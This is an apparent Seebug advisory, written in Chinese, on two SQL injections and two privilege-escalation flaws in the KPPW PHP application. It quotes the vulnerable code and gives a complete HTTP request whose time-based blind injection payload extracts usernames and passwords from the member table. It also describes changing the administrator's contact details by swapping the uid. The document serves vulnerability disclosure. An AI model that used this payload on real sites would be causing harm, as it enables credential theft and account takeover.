KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处)

2014-12-09T00:00:00
ID SSV:94515
Type seebug
Reporter Root
Modified 2014-12-09T00:00:00

Description

简要描述:

KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处),附脚本

详细说明:

KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处),附脚本 第一处SQL注入 文件/control/user/account_basic.php:

if($intUserRole === 2){ ...... }else{ $intAuthStatus = keke_auth_fac_class::auth_check ( "realname", $gUid ); if (isset($formhash)&&kekezu::submitcheck($formhash)) { if (strtotime($birthday)>=strtotime(date('Y-m-d',time()))) { $tips['errors']['birthday'] = '出生日期不得大于或等于当前日期'; kekezu::show_msg($tips,NULL,NULL,NULL,'error'); } if (strtoupper ( CHARSET ) == 'GBK') { $truename = kekezu::utftogbk($truename ); } $arrData = array( 'indus_pid' =>$indus_pid, 'indus_id' =>$indus_id, 'truename' =>$truename, 'sex' =>$sex, 'birthday' =>$birthday, ); $objSpaceT->save($arrData,$pk); unset($objSpaceT); kekezu::show_msg('已保存',NULL,NULL,NULL,'ok'); } }

这里在保存基本信息时,变量$pk进入了save函数 跟进save函数,文件/lib/inc/keke_table_class.php:

function save($fields, $pk = array()) { foreach ( $fields as $k => $v ) { $kk = ucfirst ( $k ); $set_query = "set" . $kk; $this->_table_obj->$set_query ( $v ); } $keys = array_keys ( $pk ); $key = $keys [0]; if (! empty ( $pk [$key] )) { $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" ); $edit_query = "edit_" . $this->_pre . $this->_table_name; $res = $this->_table_obj->$edit_query (); } else { $create_query = "create_" . $this->_pre . $this->_table_name; $res = $this->_table_obj->$create_query (); } if ($res) { return $res; } else { return false; } }

当$pk[$key]不为空时,$key进入where条件,最后进入>$edit_query,进入sql语句 由于这里的key咋此系统是为全局处理的,也未加引号保护,导致sql注入 第二处SQL注入 文件/control/user/account_contact.php:

if (isset($formhash)&&kekezu::submitcheck($formhash)) { $arrData =array( 'email' =>$email, 'mobile'=>$mobile, 'qq' =>$qq, 'msn' =>$msn, 'phone' =>$phone, 'province'=>$province, 'city'=>$city, 'area'=>$area ); $intRes = $objSpaceT->save($arrData,$pk);

同理变量$pk进入sql语句,原理同上,导致SQL注入漏洞 有因为这里在更新用户基本信息时,where条件是根据用户数据的uid进行update 所以,这里我们可以update任意用户的基本信息了,导致越权操作 同理也能修改任意用户的联系方式 两处SQL注入,两处越权操作

漏洞证明:

发送此请求会延迟5秒返回:

POST /KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic Content-Length: 239 Cookie: PHPSESSID=v8bshmlaa5qi5s47tnbpvulba5 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache formhash=6cb7d4&pk%5Buid%3d5529+and+if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)%3dchar(97),sleep(5),1)%23%5D=5529&indus_pid=-1&indus_id=-1&truename=%E4%B9%8C%E4%BA%91%E4%B8%80&sex=-1&birthday=1111-11-11

看看数据库执行结果

<img src="https://images.seebug.org/upload/201412/070150135b4361998e372b8b34c9dce5318195d6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

sql语句 成功执行 获取数据使用sqlmap即可 测试代码给出简单跑数据脚本 越权操作,这里我们注册普通用户登录 然后修改联系方式,抓包,修改uid=1,即为admin的uid

<img src="https://images.seebug.org/upload/201412/07021956e2ee4e0fd7cd2bc8c3b0143baf097cc5.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

然后即可修改管理员的联系方式

<img src="https://images.seebug.org/upload/201412/07021631f26170caa602493b4fede70636225c64.png" alt="2.png" width="600" onerror="javascript:errimg(this);">